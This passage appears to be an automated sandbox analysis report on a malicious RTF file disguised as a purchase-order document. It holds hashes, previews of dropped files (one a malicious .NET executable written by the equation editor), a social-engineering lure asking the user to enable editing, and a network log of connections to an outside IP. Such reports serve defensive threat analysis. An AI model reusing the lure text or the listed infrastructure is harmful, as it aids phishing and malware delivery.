                                  • 172.67.134.136
                                  SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                  • 172.67.134.136
                                  SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.134.136
                                  UGS - CRO REQ - KHIDUBAI (OPL-841724).scrGet hashmaliciousPureLog Stealer, zgRATBrowse
                                  • 172.67.134.136
                                  Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                  • 172.67.134.136
                                  2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                  • 172.67.134.136
                                  CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.134.136
                                  SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtfGet hashmaliciousRemcosBrowse
                                  • 172.67.134.136
                                  No context
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):331264
                                  Entropy (8bit):7.627305719102204
                                  Encrypted:false
                                  SSDEEP:6144:rOj1a7g+3FrDC0X4mowIsa8IaG8VdKmR5gwJgbDjamdLW9tHQB:q07g+3lv4mowAMJJgbDjamdLWQ
                                  MD5:37383DB5D0AAF3A258780342654AE739
                                  SHA1:67C7CCFF56B2CE1C9ED11B18507557077CDC07D9
                                  SHA-256:69F201E15280F32573FFDAFDE0CF139DEADCB9FA7D56BFD733B67F795560FEA4
                                  SHA-512:93D2CFB22EC9F8CA3D0E75995753AF0143ABB700333F4D1FA2C89AF369ABA1EF84041B2AE41047D5DED9A328B4C5E59CAE81F3F23CC7ABDA323BD2DB8DBC74B0
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............. ... ...@....@.. ....................................@.................................. ..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........................*................................................(.......r...ps....}.....s....}....*r..{.....o......{.....o.....*V..{....o .....o!...&*".(.....*.(#........(&...~....(....o'...o(....#......*J.~....t)...()...&*&.(......*".......*.0............{.....+..*.0..9.........{.....{....o.......{....o.......{....o....}..........z*...........!4.......0..4.........{.....{....o.......{....o......{....o....&......z*........./.......0..E..........i. ....(....r...po...
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:CE338FE6899778AACFC28414F2D9498B
                                  SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                  SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                  SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1024
                                  Entropy (8bit):0.05390218305374581
                                  Encrypted:false
                                  SSDEEP:3:ol3lYdn:4Wn
                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):61952
                                  Entropy (8bit):3.624259440720678
                                  Encrypted:false
                                  SSDEEP:768:jgI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g0ON85:oSyemuSyemuSyemyN8ToQ7OMus
                                  MD5:BAA24A774E0BADCB35F9BF233587A06E
                                  SHA1:ABBF95BC27A25FA319E71C59DF5CCB013F0D375C
                                  SHA-256:46E2D4310F7C18BA282FAA3F626D22BED15FD2DBFA185882C3BD86D8EC2EB101
                                  SHA-512:83274DB8E20DCCEA75E196BB85E5C116B802C6E6C5E6AECC4DC0CBEC7CD30BB20C372CED080473D0CA141A15338A21746E2428B13C588ACB4EE217F6CA56BAF2
                                  Malicious:false
                                  Reputation:low
                                  Preview:7.8.4.7.2.1.6.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .t.
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1536
                                  Entropy (8bit):1.3560167139182788
                                  Encrypted:false
                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbI:IiiiiiiiiifdLloZQc8++lsJe1Mz3/
                                  MD5:B26F1521ACF9ABE833D567E6534A139A
                                  SHA1:1AE73A78FF4EF7E4F144D0293E5192949D41114C
                                  SHA-256:4C5B20D1155954E5D26B7A76DE6B35A4C7BA6148AADDDC5C671555D0FDDF3E52
                                  SHA-512:CE5E2C6D45F47223A83A816A8047CB633C06743A4D5F1650A86D4BF0697696E705D15856B0C822BD894D430D101CB6E7E018964D44CAFA31800C5BD0EB33AA3A
                                  Malicious:false
                                  Reputation:low
                                  Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:03 2023, mtime=Fri Aug 11 15:42:03 2023, atime=Tue Apr 23 04:49:52 2024, length=212028, window=hide
                                  Category:dropped
                                  Size (bytes):1189
                                  Entropy (8bit):4.547298904247192
                                  Encrypted:false
                                  SSDEEP:24:8aVX/XTzUc986JrtA2o0ehe8dJfQtA2o02Dv3qaik7N:8ax/XTYcC6JrtAp0cPdJfQtAp0dNiN
                                  MD5:8C3014AB4FA907789AB58EB780E73990
                                  SHA1:B8982001AA3B3662A507E771432F323F923E4120
                                  SHA-256:0D144BD4F269457067F2461BFD5294B255F0C2DEC213AFF6AB084A7FC16226AC
                                  SHA-512:3C755E919DC057AA11E45997750299A23A5BE8FC37D87AE16857797F0B56E077DB21DD47A1DB6462915D2ED16479F267188475BD737B4C6CEEA8D00CDA743737
                                  Malicious:false
                                  Reputation:low
                                  Preview:L..................F.... ...r...r...r...r....C..B...<<...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X8...user.8......QK.X.X8.*...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.<<...X;. .ATTHAC~1.DOC..........WB..WB.*.........................A.T.T.H.A.C.H.E.D. .S.C.A.N.-.P...O. .S.P.E.C.I.F.I.C.A.T.I.O.N.S...0.0.9...2.4... .0.0.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\528110\Users.user\Desktop\ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc.H.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.T.T.H.A.C.H.E.D. .S.C.A.N.-.P...O. .S.P.E.C.I.F.I.C.A.T.I.O.N.S...0.0.9...2.4... .0.0.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:Generic INItialization configuration [folders]
                                  Category:dropped
                                  Size (bytes):124
                                  Entropy (8bit):4.7930073029725015
                                  Encrypted:false
                                  SSDEEP:3:M14x7gTSJG9LBLXS2m4ghgTSJG9LBLXS2v:M+x7MSJSFChMSJSFl
                                  MD5:F4365DCB33163821E292273391E955E2
                                  SHA1:56857D8E6E172C48FA139262FEA7ADD7CEC7A7AE
                                  SHA-256:6B79EDF535382412A5D8D8E908A2F7B934AF15F2AC24CB55339FA8D17429C600
                                  SHA-512:ED0172835E4901A93284B8C312ED8B945B8E70FECC8F2043E50ACAE1A3AE061DA4F1634A35FF3D5B5C51A179EA8A9DC5DA7D32AC50E41317B3E7E888F5A19991
                                  Malicious:false
                                  Reputation:low
                                  Preview:[doc]..ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.LNK=0..[folders]..ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.LNK=0..
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):162
                                  Entropy (8bit):2.4797606462020307
                                  Encrypted:false
                                  SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                  MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                  SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                  SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                  SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):331264
                                  Entropy (8bit):7.627305719102204
                                  Encrypted:false
                                  SSDEEP:6144:rOj1a7g+3FrDC0X4mowIsa8IaG8VdKmR5gwJgbDjamdLW9tHQB:q07g+3lv4mowAMJJgbDjamdLWQ
                                  MD5:37383DB5D0AAF3A258780342654AE739
                                  SHA1:67C7CCFF56B2CE1C9ED11B18507557077CDC07D9
                                  SHA-256:69F201E15280F32573FFDAFDE0CF139DEADCB9FA7D56BFD733B67F795560FEA4
                                  SHA-512:93D2CFB22EC9F8CA3D0E75995753AF0143ABB700333F4D1FA2C89AF369ABA1EF84041B2AE41047D5DED9A328B4C5E59CAE81F3F23CC7ABDA323BD2DB8DBC74B0
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............. ... ...@....@.. ....................................@.................................. ..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........................*................................................(.......r...ps....}.....s....}....*r..{.....o......{.....o.....*V..{....o .....o!...&*".(.....*.(#........(&...~....(....o'...o(....#......*J.~....t)...()...&*&.(......*".......*.0............{.....+..*.0..9.........{.....{....o.......{....o.......{....o....}..........z*...........!4.......0..4.........{.....{....o.......{....o......{....o....&......z*........./.......0..E..........i. ....(....r...po...
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):162
                                  Entropy (8bit):2.4797606462020307
                                  Encrypted:false
                                  SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
                                  MD5:89AFCB26CA4D4A770472A95DF4A52BA8
                                  SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
                                  SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
                                  SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
                                  Malicious:false
                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                  File type:Rich Text Format data, version 1
                                  Entropy (8bit):3.1325400825369365
                                  TrID:
                                  • Rich Text Format (5005/1) 55.56%
                                  • Rich Text Format (4004/1) 44.44%
                                  File name:ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc
                                  File size:212'028 bytes
                                  MD5:d90ae35b86323a7495fbd0f89b74ad08
                                  SHA1:a913d6148cbfb3a5be68a34052a4d1ab7d9de989
                                  SHA256:88ad296056a6be66969f1e5ce6694398944804a39d8465b42e0af73c5af12cb0
                                  SHA512:54e720b166c2a2e780c973d4da1b93403e098526cea1ac11a49ef8915eeea7c97faa905b233905d86adb2a0ec7e02ea412eb31608b5634bdd3685f9f183a9e94
                                  SSDEEP:768:sfDwAbZSibMX9gRWjtwAbZSibMX9gRWjtwAbZSibMX9gRWjAFU+Gt8ygBa75ZtaM:OwAlRkwAlRkwAlRPU+G+Xa75ZcqT
                                  TLSH:B624792DC34B02598F620376AB175E5142BDBA7EF38552B1346C437933EEC39A1252BE
                                  File Content Preview:{\rtf1..{\*\2Gg1NgJmSXbTxemlqsiLDkQRN9no9PRoVU1qJYcyTiTnF1tamoZl18rPgWfFi7FlimUYuhO29AgIEYqEYYFwoniNFT5GnTI9ocVtp8XFcTflaGUxHeAdGlseBUTd4WXHxZReiuxs37oywAm38bkf04GTe9F8BJqQJ9jdE1YEcfXiyKaoHwMmiln9pymYnq8r2uma2XEZRdFlKkqUrERm2qMyrTVgY9KsGMzKnSuAhYLtfTRP2yN
                                  Icon Hash:2764a3aaaeb7bdbf
                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                  00000789Ahno
                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 23, 2024 07:49:56.795392036 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:56.795474052 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:56.795552969 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:56.806135893 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:56.806162119 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.010586023 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.010796070 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.015976906 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.015988111 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.016307116 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.016351938 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.088438988 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.132141113 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.432013988 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.432171106 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.432203054 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.432379007 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.432390928 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.432437897 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.432480097 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.432532072 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.432609081 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.432661057 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.432738066 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.432791948 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.432863951 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.432915926 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.432990074 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.433036089 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.433116913 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.433171988 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.433262110 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.433360100 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.433429003 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.433480978 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.433532000 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.433579922 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.437666893 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.532226086 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.532288074 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.532295942 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.532327890 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.532330036 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.532367945 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.532376051 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.532408953 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.532422066 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.532453060 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.532455921 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.532488108 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.532764912 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.532804012 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.532816887 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.532851934 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.532855034 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.532887936 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.533216953 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.533256054 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.533258915 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.533292055 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.533293962 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.533323050 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.533613920 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.533652067 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.533654928 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.533695936 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.533739090 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.533771038 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.533782005 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.533814907 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.533817053 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.533849001 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.533852100 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.533885956 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.534393072 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.534434080 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.534435987 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.534466028 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.633590937 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.633663893 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.633790970 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.633841038 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.633920908 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.633968115 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.634053946 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.634118080 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.634201050 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.634253025 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.634344101 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.634393930 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.634466887 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.634514093 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.634604931 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.634654045 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.634727001 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.634769917 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.634881020 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.634932041 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.635025978 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.635077000 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.635164022 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.635219097 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.635559082 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.635618925 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.635804892 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.635863066 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.636286974 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.636373997 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.636563063 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.636624098 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.637589931 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.637645960 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.637945890 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.638004065 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.638134003 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.638196945 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.638375044 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.638432026 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.638489962 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.638539076 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.735409021 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.735502005 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.735591888 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.735760927 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.735773087 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.735819101 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.735867977 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.735919952 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.736217022 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.736287117 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.736376047 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.736437082 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.737341881 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.737417936 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.737648964 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.737715960 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.737885952 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.737956047 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.738246918 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.738317966 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.738631964 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.738694906 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.738807917 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.738867998 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.739027977 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.739094019 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.739473104 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.739536047 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.739993095 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.740056038 CEST49161443192.168.2.22172.67.134.136
                                  Apr 23, 2024 07:49:57.740149021 CEST44349161172.67.134.136192.168.2.22
                                  Apr 23, 2024 07:49:57.740200043 CEST49161443192.168.2.22172.67.134.136
